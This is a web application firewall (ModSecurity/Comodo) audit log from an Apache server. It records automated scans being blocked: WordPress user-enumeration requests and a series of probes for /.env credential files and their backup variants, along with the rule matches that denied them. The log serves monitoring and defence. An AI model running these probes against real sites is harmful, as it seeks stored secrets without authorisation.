Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a02d4728-Z-- --d97bc85a-A-- [11/Jun/2025:19:42:42 +0700] aEl5wgI48YPcPeAOw9tT0AAAAAM 103.236.140.4 42382 103.236.140.4 8181 --d97bc85a-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d97bc85a-C-- ƒ6examplecom --d97bc85a-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d97bc85a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645762916691 3353 (- - -) Stopwatch2: 1749645762916691 3353; combined=2127, p1=427, p2=1626, p3=22, p4=28, p5=24, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d97bc85a-Z-- --f9304908-A-- [11/Jun/2025:19:42:43 +0700] aEl5w27bf2YTFvcEXPuKZQAAAFc 103.236.140.4 42388 103.236.140.4 8181 --f9304908-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --f9304908-C-- ¥Äexamplecom --f9304908-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9304908-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645763438302 2848 (- - -) Stopwatch2: 1749645763438302 2848; combined=1867, p1=444, p2=1355, p3=21, p4=22, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9304908-Z-- --ed4c285c-A-- [11/Jun/2025:19:42:44 +0700] aEl5xAI48YPcPeAOw9tT1QAAAAs 103.236.140.4 42394 103.236.140.4 8181 --ed4c285c-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --ed4c285c-C-- ¢\examplecom --ed4c285c-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --ed4c285c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645764160482 3654 (- - -) Stopwatch2: 1749645764160482 3654; combined=2301, p1=463, p2=1747, p3=33, p4=31, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed4c285c-Z-- --54f6f63b-A-- [11/Jun/2025:19:42:45 +0700] aEl5xQI48YPcPeAOw9tT2AAAABE 103.236.140.4 42400 103.236.140.4 8181 --54f6f63b-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --54f6f63b-C-- §rexamplecom --54f6f63b-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --54f6f63b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645765418732 2869 (- - -) Stopwatch2: 1749645765418732 2869; combined=1784, p1=408, p2=1301, p3=27, p4=23, p5=25, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54f6f63b-Z-- --17f6f50b-A-- [11/Jun/2025:20:25:07 +0700] aEmDswI48YPcPeAOw9tUJgAAAAM 103.236.140.4 42794 103.236.140.4 8181 --17f6f50b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.221.192.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.221.192.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --17f6f50b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17f6f50b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749648307563567 3415 (- - -) Stopwatch2: 1749648307563567 3415; combined=1494, p1=518, p2=945, p3=0, p4=0, p5=31, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17f6f50b-Z-- --c19b653f-A-- [11/Jun/2025:21:21:00 +0700] aEmQzJP8TulJ-kfHNvEGkQAAANA 103.236.140.4 44514 103.236.140.4 8181 --c19b653f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.255.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.255.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c19b653f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c19b653f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749651660994831 3191 (- - -) Stopwatch2: 1749651660994831 3191; combined=1368, p1=465, p2=874, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c19b653f-Z-- --7327be29-A-- [11/Jun/2025:21:44:08 +0700] aEmWOG7bf2YTFvcEXPuLAAAAAE4 103.236.140.4 44794 103.236.140.4 8181 --7327be29-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept-Charset: utf-8 --7327be29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7327be29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749653048262226 893 (- - -) Stopwatch2: 1749653048262226 893; combined=341, p1=297, p2=0, p3=0, p4=0, p5=43, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7327be29-Z-- --aa85f96c-A-- [11/Jun/2025:21:56:51 +0700] aEmZM5P8TulJ-kfHNvEGzgAAANc 103.236.140.4 45000 103.236.140.4 8181 --aa85f96c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.93.89.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.93.89.50 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --aa85f96c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa85f96c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749653811183605 1889 (- - -) Stopwatch2: 1749653811183605 1889; combined=298, p1=261, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa85f96c-Z-- --35fa7901-A-- [11/Jun/2025:21:56:52 +0700] aEmZNNDFbATf6vJlOUt7dwAAAIM 103.236.140.4 45004 103.236.140.4 8181 --35fa7901-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.93.89.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.93.89.50 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --35fa7901-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35fa7901-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749653812236641 699 (- - -) Stopwatch2: 1749653812236641 699; combined=296, p1=263, p2=0, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35fa7901-Z-- --908f0a62-A-- [11/Jun/2025:22:10:34 +0700] aEmcam7bf2YTFvcEXPuLMAAAAFg 103.236.140.4 45174 103.236.140.4 8181 --908f0a62-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1 Accept-Charset: utf-8 --908f0a62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --908f0a62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749654634569244 648 (- - -) Stopwatch2: 1749654634569244 648; combined=252, p1=223, p2=0, p3=0, p4=0, p5=29, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --908f0a62-Z-- --c2745851-A-- [11/Jun/2025:22:24:47 +0700] aEmfv5P8TulJ-kfHNvEG9AAAAM4 103.236.140.4 45296 103.236.140.4 8181 --c2745851-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --c2745851-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2745851-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655487076704 856 (- - -) Stopwatch2: 1749655487076704 856; combined=364, p1=325, p2=0, p3=0, p4=0, p5=39, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2745851-Z-- --8042fa17-A-- [11/Jun/2025:22:24:47 +0700] aEmfv5P8TulJ-kfHNvEG9QAAAM0 103.236.140.4 45298 103.236.140.4 8181 --8042fa17-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --8042fa17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8042fa17-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655487320448 627 (- - -) Stopwatch2: 1749655487320448 627; combined=251, p1=218, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8042fa17-Z-- --10754701-A-- [11/Jun/2025:22:24:47 +0700] aEmfv5P8TulJ-kfHNvEG9gAAANE 103.236.140.4 45300 103.236.140.4 8181 --10754701-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --10754701-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10754701-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655487539638 802 (- - -) Stopwatch2: 1749655487539638 802; combined=338, p1=301, p2=0, p3=0, p4=0, p5=36, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10754701-Z-- --ec61b76f-A-- [11/Jun/2025:22:24:47 +0700] aEmfv5P8TulJ-kfHNvEG9wAAANM 103.236.140.4 45302 103.236.140.4 8181 --ec61b76f-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --ec61b76f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec61b76f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655487745180 638 (- - -) Stopwatch2: 1749655487745180 638; combined=269, p1=236, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec61b76f-Z-- --62668b35-A-- [11/Jun/2025:22:24:47 +0700] aEmfv5P8TulJ-kfHNvEG-AAAANY 103.236.140.4 45304 103.236.140.4 8181 --62668b35-B-- GET /.env.old HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --62668b35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62668b35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655487968819 635 (- - -) Stopwatch2: 1749655487968819 635; combined=250, p1=215, p2=0, p3=0, p4=0, p5=34, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62668b35-Z-- --5776f830-A-- [11/Jun/2025:22:24:48 +0700] aEmfwJP8TulJ-kfHNvEG-QAAANQ 103.236.140.4 45306 103.236.140.4 8181 --5776f830-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --5776f830-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5776f830-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655488182633 673 (- - -) Stopwatch2: 1749655488182633 673; combined=297, p1=264, p2=0, p3=0, p4=0, p5=33, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5776f830-Z-- --1c314f78-A-- [11/Jun/2025:22:24:48 +0700] aEmfwJP8TulJ-kfHNvEG-gAAANU 103.236.140.4 45308 103.236.140.4 8181 --1c314f78-B-- GET /.env.sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --1c314f78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c314f78-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655488401004 664 (- - -) Stopwatch2: 1749655488401004 664; combined=260, p1=225, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c314f78-Z-- --deaf941e-A-- [11/Jun/2025:22:24:48 +0700] aEmfwJP8TulJ-kfHNvEG-wAAAMA 103.236.140.4 45310 103.236.140.4 8181 --deaf941e-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --deaf941e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --deaf941e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655488622826 639 (- - -) Stopwatch2: 1749655488622826 639; combined=247, p1=214, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --deaf941e-Z-- --cb86c721-A-- [11/Jun/2025:22:24:48 +0700] aEmfwJP8TulJ-kfHNvEG_AAAANI 103.236.140.4 45312 103.236.140.4 8181 --cb86c721-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --cb86c721-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb86c721-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655488851879 628 (- - -) Stopwatch2: 1749655488851879 628; combined=258, p1=214, p2=0, p3=0, p4=0, p5=44, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb86c721-Z-- --535f3742-A-- [11/Jun/2025:22:24:49 +0700] aEmfwZP8TulJ-kfHNvEG_QAAAMQ 103.236.140.4 45314 103.236.140.4 8181 --535f3742-B-- GET /.env.development HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --535f3742-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --535f3742-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
